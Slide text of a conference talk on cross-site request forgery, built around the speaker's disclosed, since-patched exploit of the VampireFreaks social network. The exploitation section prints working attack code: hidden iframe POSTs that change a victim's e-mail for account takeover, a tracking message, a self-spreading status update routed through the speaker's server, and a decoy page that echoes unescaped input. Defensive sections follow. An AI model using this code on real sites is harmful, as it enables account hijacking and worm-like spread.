Surf’s Up!
Daniel McCarney (@binaryparadox)
The Next HOPE
Exploring Cross Site Request Forgery through social network exploitation.
http://binaryparadox.net [email protected]
Surf's Up!
1. CSRF Background
2. Theory
3. VampireFreaks Exploitation
4. CSRF Protection
5. Interesting Benefits & CSRF Variation
CSRF?
● CSRF → “Sea Surf” → Cross Site Request Forgery
● Self-explanatory name:
– Forcing requests to a site from another
● Open Web Application Security Project [1] Top 10
– #5 in 2007 [2]
– #5 in 2010 [3]
– 3 years and no improvement?
● “Prevalence: widespread” [3]
● “Detectability: easy” [3]
Widespread
● First BugTraq Posting. CSRF term coined (2001)
– “Cross-Site Request Forgeries (Re: The Dangers of Allowing Users to Post Images)” [4]
● Ed Felten, Bill Zeller (2008)
– "Cross-Site Request Forgeries: Exploitation and Prevention" [5]
– ING Direct, Youtube, MetaFilter, NY Times
● “Sleeping Giant” [6]
● Very little developer knowledge!
We <3 CSRF
● Easy!
– Web apps are often custom code, i.e. likely vulnerable
– Moving back to thin clients & hosted services
● Very different from XSS. Less understood
– XSS and CSRF are complementary
– XSS helps us bypass CSRF protections
● Powerful implications
– If the user can do it, you can force them to do it
Surf's Up!
1. CSRF Background
2. Theory
3. VampireFreaks Exploitation
4. CSRF Protection
5. Interesting Benefits & CSRF Variation
Storytime
● Imagine a made-up website, community.com
– Has various “members-only” sections
– Written in PHP, beginner to novice developer
● Members are able to post content to different topic threads
– Links, images, styled & formatted text
– Potentially BBCode/Limited Markup?
● Authentication done by Cookie & PHP Session
– HTTP Cookie with a session ID set by login code
● Needs a way to log members out by request
– http://community.com/app/logout.php
Storytime
● Logout script receives a GET from an authenticated member
– Expires cookie, ends session, cleans-up
● Is there a problem?
● A tale of two users: Alice & Mallory
● Mallory posts a crafted image tag to part of a members only community.
– <img src="http://community.com/app/logout.php" />
– [img]http://community.com/app/logout.php[/img]
Trouble at Sea
● Alice logs in to community.com
– Session ID stored in a cookie for community.com
● Alice browses to Mallory's crafted post
● Image tag is processed by Alice's browser
● GET request sent to http://community.com/app/logout.php to acquire image data
– Cookie is sent along for the ride!
– Why not? It's set for community.com
● Logout script dutifully gives Alice the boot!
Picture >= 1000 Words
(Mis)understanding
● A purposefully toy example
● Bad “form” (har har) to logout with a GET request
– GET should be “Idempotent” [7] → No side effects
● Potentially misleading – CSRF does not rely on:
– The ability to post content to a target site,
– Image tags or a specific markup language
– A GET based form
(Mis)understanding
● No requirement for content creation rights
– No need for tags/content to be placed on community.com
– Remember the “cross site” aspect?
● Not particular to Image tags
– Lots of tags invoke GET requests automatically
● Further, not limited to GET method forms
– Either social engineer a form POST
– Or use JavaScript to submit one automatically
More Complex Flow
Surf's Up!
1. CSRF Background
2. Theory
3. VampireFreaks Exploitation
4. CSRF Protection
5. Interesting Benefits & CSRF Variation
VampireFreaks
● What is it? → “Gothbook”?
● ~1,228,795 members
● ~3,000 members online at any given time
● Appeal of social networks:
– Easy to embed content → images, CSS, HTML
– Easy to socially engineer users
– Easy to spread → designed for sharing!
Disc-lame-er
● Vulnerability (mostly) already patched
– Disclosed responsibly
– Never released in the wild
– Wonderful treatment from admins
● Your actions are your own, not mine
● Yadda, yadda, yadda
Attack Flow
● Attack components:
– Exploit – located on my server, POST-based
– A tracking account – hit tracking via PM
– Status updates – provide “viral” component
– Social Engineering – luring logged in users to exploit
Social Engineering
● POST-based exploit means off-site visit required
● Need to lure logged-in users to exploit
– Enticing links in Forum Posts/Personal Messages
● Need to hide the true nature of the exploit
– BASE64 encoded URL parameter for “decoy” content
– Main page iframes the content of benign URL param
VF DOMination
● Exploit Code:
– Crafted POST requests submitting to VF
– Contained in iframes to conceal responses
– Submitted automatically via JavaScript
● 3 POSTs:
1) Changes registered e-mail address
2) Sends tracking PM
3) Updates the user's status
E-mail Switch-a-roo
<form action="" method="post">
  <input type="hidden" value="" name="x">
  New Email: <input value="" name="new_email" maxlength="100" size="50">
  <br><br>
  <input type="submit" value=" click here to send my validation email to my new email address ">
</form>
Tracking PM
<form name="comment_form" onsubmit="submitonce(this)" action="" method="post">
  <input type="hidden" value="paradox" name="user">
  <input type="hidden" value="124670" name="uid">
  <input type="hidden" value="0" name="comment_id">
  <input type="hidden" value="0" name="i">
  <textarea wrap="soft" rows="13" cols="60" name="comment" id="comment_textarea"></textarea>
  ...
  <input type="checkbox" value="1" name="private"> Send To Inbox
  <input type="checkbox" value="1" id="preview" name="preview">Preview
  <input type="checkbox" checked="" value="1" name="include_sig">Include Signature
  ...
  <input type="submit" onclick="sendUserMessage(this.form, 'paradox'); return false;" value=" submit comment ">
</form>
Status Updates
<form method="post" action="/profiles/update_status.php" name="status_form">
  <span id="current_status">
    <input type="submit" onclick="updateStatus(); return false;" id="spopupgo" value="Go" name="submitstatus">
    <textarea onclick="getFocusChangeInput('update status...', this.id);" onblur="loseFocusChangeInput('update status...', this.id);" name="status_input" id="spopuptextarea">update status...</textarea>
  </span>
</form>
Code Sample
<script type='text/javascript' language='JavaScript'>
// Builds the form-writer URL from the target and the form fields, then loads it
// in a 1x1 iframe so the response never shows on the page (see "VF DOMination").
function crossDomainPost(writer_url, post_target_url, params) {
  var url_params = '';
  for (var key in params) {
    url_params = url_params + '&' + key + '=' + encodeURIComponent(params[key]);
  }
  var url = writer_url + '?post_target_url=' + encodeURIComponent(post_target_url) + url_params;
  var iframe = document.createElement('iframe');
  iframe.setAttribute('src', url);
  iframe.setAttribute('width', 1);
  iframe.setAttribute('height', 1);
  iframe.setAttribute('style', 'border: none;');
  var p = document.getElementsByTagName('html');
  p[0].appendChild(iframe);
}
</script>
Code Sample…
// Status update pointing back at the current page: the "viral" component.
var news_link = document.location;
crossDomainPost(
  'http://binaryparadox.net/vf/form_writer.php',
  'http://vampirefreaks.com/serv/ajaxController.php',
  { action: 'updateStatus', home: '0', status: news_link }
);
</script>
<?php
  // Decoy content: the BASE64 "id" parameter names the benign page shown in the iframe.
  $target = $_GET['id'];
  $target = base64_decode($target);
?>
<iframe src="<?php echo $target; ?>" width='100%' height='100%' style="border: none"/>
Nothing to see here, move along
Wheels within wheels
The plot thickens...
● With the account e-mail changed, you could gain the account password
– “Forgot my password” feature
– Original account password sent in clear text
● Victims tracked by the PM sent
● Propagation achieved through status updates pointing back to the exploit page
BAD BAD BAD BAD!
Surf's Up!
1. CSRF Background
2. Theory
3. VampireFreaks Exploitation
4. CSRF Protection
5. Interesting Benefits & CSRF Variation
Halp! – Protection against CSRF
● Referrer checking
– All actions on site pass along the page referrer
– App checks referrer that sourced the submit
● vampirefreaks.com vs binaryparadox.net
● Effective?
– Possibly not foolproof...
– Plugin vulnerabilities (maybe?)
– XSS-paired CSRF? → issues regardless...
Halp! – Protection against CSRF
● Nonce → a difficult to predict key/secret
● Should be generated per-request!
– Server writes nonce in hidden param for each form
– Also stores nonce in user's server side session
● Future requests must have the correct nonce
● Need XSS to access nonce as attacker [8]
VF E-mail Change 2.0
<form action="" method="post">
  <input type="hidden" value="4a39014473ccf63bffdd8d96296b85b8d84f0ef4" name="validate">
  <input type="hidden" value="" name="x">
  New Email: <input value="" name="new_email" maxlength="100" size="50">
  <br><br>
  <input type="submit" value=" click here to send my validation email to my new email address ">
</form>
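Server-side version of the two defences from the "Halp!" slides (referrer check plus a per-request nonce kept in the session), written here as an added Python example; it is neither the talk's nor VampireFreaks' code. It also closes the community.com logout-by-GET hole from the Storytime section by refusing any non-POST state change. The in-memory SESSIONS store, the community.com host and the cut-down form markup are constructed stand-ins; only the hidden field name validate comes from the form above.

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Constructed in-memory session store (session id -> data); stands in for the
# PHP session the slides describe. None of this is VampireFreaks' own code.
SESSIONS = {}

def new_session(user):
    sid = secrets.token_hex(16)
    SESSIONS[sid] = {"user": user, "nonces": set()}
    return sid

def issue_nonce(sid):
    """Fresh nonce for one form render, remembered server side (the 'per-request' rule)."""
    nonce = secrets.token_hex(20)  # 40 hex chars, like the 'validate' value above
    SESSIONS[sid]["nonces"].add(nonce)
    return nonce

def render_email_form(sid):
    """Write the nonce into a hidden 'validate' field, as the patched VF form does."""
    nonce = issue_nonce(sid)
    return ('<form action="" method="post">'
            f'<input type="hidden" name="validate" value="{nonce}">'
            '<input name="new_email"><input type="submit"></form>')

def origin_allowed(headers, site_host):
    """Referrer check from the slides: Origin (or Referer) must name the site itself."""
    ref = headers.get("Origin") or headers.get("Referer")
    if not ref:
        return False  # strict: a stripped header costs a retry, not an account
    return urlsplit(ref).hostname == site_host

def handle_state_change(method, sid, headers, form, site_host="community.com"):
    """Accept only a same-site POST carrying a valid, unused nonce; returns (ok, reason)."""
    if method != "POST":  # the logout-by-GET mistake from the community.com story
        return False, "state change must be POST"
    if not origin_allowed(headers, site_host):
        return False, "cross-site origin"
    session = SESSIONS.get(sid)
    if session is None:
        return False, "no session"
    supplied = form.get("validate", "")
    for nonce in session["nonces"]:
        if hmac.compare_digest(nonce.encode(), supplied.encode()):  # constant-time compare
            session["nonces"].discard(nonce)  # single use, so a leaked nonce cannot be replayed
            return True, "accepted"
    return False, "missing or invalid nonce"
```

The XSS caveat from the slide still holds: script running on the site itself can read the hidden field and pass every check here.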
Surf's Up!
1. CSRF Background
2. Theory
3. VampireFreaks Exploitation
4. CSRF Protection
5. Interesting Benefits & CSRF Variation
What else?
● Cross Protocol Attacks
– Largely the same as CSRF
– Payload form data aimed at a non-HTTP service
● Jochen Topf – 2001
– “HTML Form Protocol Attack” [9]
– Tricking browsers into sending arbitrary data to specified port
– FTP, SMTP, NNTP, POP3, IMAP, & IRC
– Led to browsers blocking some ports by default [10]
For the Lulz
● Blacklists are never perfect!
– Ask Goatse Security!
● Firefox XPS IRC Attack [11]
– Default IRC port not on blocked list
– Reflected IRC spam in the quest for lulz
● Safari XPS Attack [12]
– Unsigned short overflow in port #
– “Add 65536 to 25 to make 65561” [12]
– 65561 != 25. Troll on.
On Obscuring Origin
● Think of exploit flow
– User requests bad content
– Bad content forces user to perform an action
● Often difficult to link bad content to action
● Attack source is the User
● What the User can access, the exploit can
On Obscuring Origin
● Behind the Wall
– Attacks can access Intranet resources
– Networking equipment
– Test servers
– Private systems
● SOHO Routers
– Reflash firmware [13]
– Set DNS Server(s) [14]
On Obscuring Origin
Clickjacking
● An evolution of CSRF?
● Still forcing authenticated client actions
● Bypasses nonce protection: whole page loaded invisibly
● Uses the real forms instead of a cross-site request (nonce intact)
● Hijacks user input to manipulate invis. page
</presentation>
● Hat tip to Ebova, Mreh, Clutch, Temujin, ZanZ
● http://friendsofbyron.alteeve.com/
Resources
1. OWASP – http://owasp.org
2. OWASP Top 10 2007 – http://www.owasp.org/index.php/Top_10_2007
3. OWASP Top 10 2010 – http://www.owasp.org/index.php/Top_10_2010
4. “Cross-Site Request Forgeries (Re: The Dangers of Allowing Users to Post Images)” – http://www.tux.org/~peterw/csrf.txt
5. “Cross-Site Request Forgeries: Exploitation and Prevention” – http://from.bz/public/documents/publications/csrf.pdf
6. “Sleeping Giant” – http://jeremiahgrossman.blogspot.com/2006/09/csrf-sleeping-giant.html
7. HTTP Spec – http://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html
8. Jack Mannino – http://twitter.com/jack_mannino
9. “HTML Form Protocol Attack” – http://www.remote.org/jochen/sec/hfpa/hfpa.pdf
10. Mozilla Port Blacklisting – http://www.mozilla.org/projects/netlib/PortBanning.html
11. Firefox XPS Attack (NSFW) – http://encyclopediadramatica.com/Firefox_XPS_IRC_Attack
12. Safari XPS Attack (NSFW) – http://encyclopediadramatica.com/Safari_XPS_Attack
13. CSRF File Upload – http://www.gnucitizen.org/blog/cross-site-file-upload-attacks/
14. CSRF BT Router Research – http://www.gnucitizen.org/blog/bt-home-flub-pwnin-the-bt-home-hub/